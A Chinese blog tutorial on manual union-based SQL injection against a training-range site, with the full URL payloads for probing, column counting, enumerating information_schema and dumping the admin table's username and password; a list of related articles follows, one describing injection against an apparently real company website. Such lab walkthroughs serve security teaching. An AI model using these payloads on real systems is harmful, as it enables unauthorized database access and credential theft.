【安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码

已于 2022-01-21 15:02:56 修改
阅读量7.8k 收藏 34
点赞数 6
分类专栏: 安全 文章标签: sql 安全 安全漏洞
于 2022-01-21 14:14:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/little_stupid_child/article/details/122617052
版权

本博客中使用封神台靶标系统进行演示,靶标系统网站

一、判断网站是否存在sql注入漏洞

1.在地址栏写入?id=1 and 1=1,回车
在这里插入图片描述
页面返回正常。
2.在地址栏写入?id=1 and 1=2,回车
在这里插入图片描述
页面返回异常,这里可能存在sql注入漏洞。

二、判断字段数

1.在地址栏写入?id=1 and 1=1 order by 3
在这里插入图片描述
页面返回异常,表的字段数小于3
2.在地址栏写入?id=1 and 1=1 order by 2
在这里插入图片描述
页面返回正常,说明表的字段数为2。

三、获取回显点

在地址栏写入?id=1 union select1,2
在这里插入图片描述
页面出现了2,说明我们可以在数字2出显示我们想要的内容。

四、显示想要的内容

1.查询当前数据库名
构造?id=1 and 1=2 uinio select 1,database(),并回车。
在这里插入图片描述
获取数据库名称为“maoshe”。
2.查询当前数据库表名
构造?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车。
在这里插入图片描述
绝大数情况下,管理员的账号密码都在admin表里。
3.在这里插入图片描述
4.查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1 回车
在这里插入图片描述
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 1,1 回车。
在这里插入图片描述
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 2,1 回车。
在这里插入图片描述
查出 admin 表里 有 id username password 三个字段。
4.查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车。
在这里插入图片描述
5.获取用户密码
构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车。
在这里插入图片描述
最终获取管理员账号和密码。

little_stupid_child
关注
专栏目录
通过SQL手工注入拿到管理员密码--辛巴猫舍
ningmini的博客
05-20 1993
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6570
sqlmap 靶场的攻击注入利用。
从0到1,SQL注入sql十大注入类型)收藏这一篇就够了,技术解析与实战演练
最新发布
黑战士的博客
06-26 1578
SQL 注入是比较常见的网络攻击方式之一,它不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至篡改数据库。由于以下的环境都是 MySQL 数据库,所以先了解点 MySQL 有关的知识。在 MySQL5.0 之后,MySQL 中默认添加了一个名为的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。mysql中注释符:# 、/**/ 、 --
通过SQL注入拿到管理员密码
qq_52337463的博客
01-14 4204
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 首先我们看下题目 题目是通过SQL注入拿到管理员后台密码 我们先点开"传送门"打开靶场 靶场已经打开了,我们先点"点击查看新闻"打开页面 看起来没啥有用的信息但是别慌,我们先进行SQL注入 在URL中***/?id=1 后面写命令进行注入 and 1=2 union select 1,concat(username,',',password) from admin 这里的admin...
sql注入获取网站后台管理员账号与密码
热门推荐
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
SQLMap获取cms 后台管理员账密
QYbkx974的博客
11-07 277
SQLMap是一款专注于sQLv 的工具,堪称神器。SQLmap 基于Python 语言编写的命令行工具,集成在KALI中。
SQL注入获取MySQL用户表密码
老洋
01-03 1173
用 group by 验证(字段个数)使用二分法。
SQL注入漏洞全接触.ppt
11-15
* SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到的资料。 二、 SQL注入漏洞的...
SQL注入漏洞发现和数据库监控系统.zip
05-27
SQL注入漏洞是网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
详细的SQL注入基础到union注入获取密码实战
chen_zhangkonzhe的博客
09-10 678
SQL注入原理 参数用户可控:从前端传给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询,当用户传入参数为1'的时候在数据库执行如下方所示。字符型注入原理当我在用户可控处输入'时SQL会报错说明可能存在SQL注入
黑客学习-SQL注入(字符型):Hackbar获取网站账号和密码
weixin_49349476的博客
09-27 2913
检查出网站存在的漏洞类型是字符型的SQL漏洞,之后利用火狐浏览中的Hackbar插件,进行SQL注入获取登录账号和密码
sql盲注 各种方法拿到 管理员账户和密码
qq_41860876的博客
11-08 1532
任务092:手动漏洞挖掘-SQL盲注笔记 介绍 web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在 下面就是没有过滤好发现了他存在sql漏洞 sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了 看一下返回就结果没有显示任何东西 ...
网络安全之web攻防 sql注入 mysql手工注入获取网站管理员账号密码
网络安全领域优质创作者
10-24 2259
该文章讲解mysql注入的思路。没有对关键字进行过滤的情况。 1.判断是否存在注入,and 1=1 没报错 1=2 错误 说明有注入点 http://xxxx.com/new_list.php?id=1 and 1=1 http://xxxx.com/new_list.php?id=1 and 1=2 2.获取字段列,判断几列 order by 4 没报错 说明有4列 htt...
SQL注入获取用户名密码(字符型注入--包含快速暴数据方法)
nielilijy的专栏
09-24 3418
1、注入测试点 http://43.247.91.228:83/content-2/index.php?user=harry 2、加'号,测试是否存在注入点 http://43.247.91.228:83/content-2/index.php?user=harry' 页面返回错误,证明可能存在注入注入点 3、验证注入点 http://43.247.91.228:83/content-2...
Web渗/透/攻/击实战(1)—成功渗/透台湾某净化设备公司官网
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
01-08 1439
写在前面 作为一个防御型白帽黑客​ 你一定要知道黑客的进攻套路 才能有相应的防御措施 声明:只做测试,发现对方的漏洞,并不进行破坏性操作 1、 网站分析 地址:http://www.xxx.com.tw/ 这是一家中国台湾地区的网站,看着满屏的繁体字,就不是很舒服 网站首页包括:关于我们、资料下载、联络方式等等。 这些对我们进行sql注入用处并不大 我们需要的是可以进行参数传入的页面,这样我们就可以在参数里做文章 找一下 有没有新闻列表相关的页面 页...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值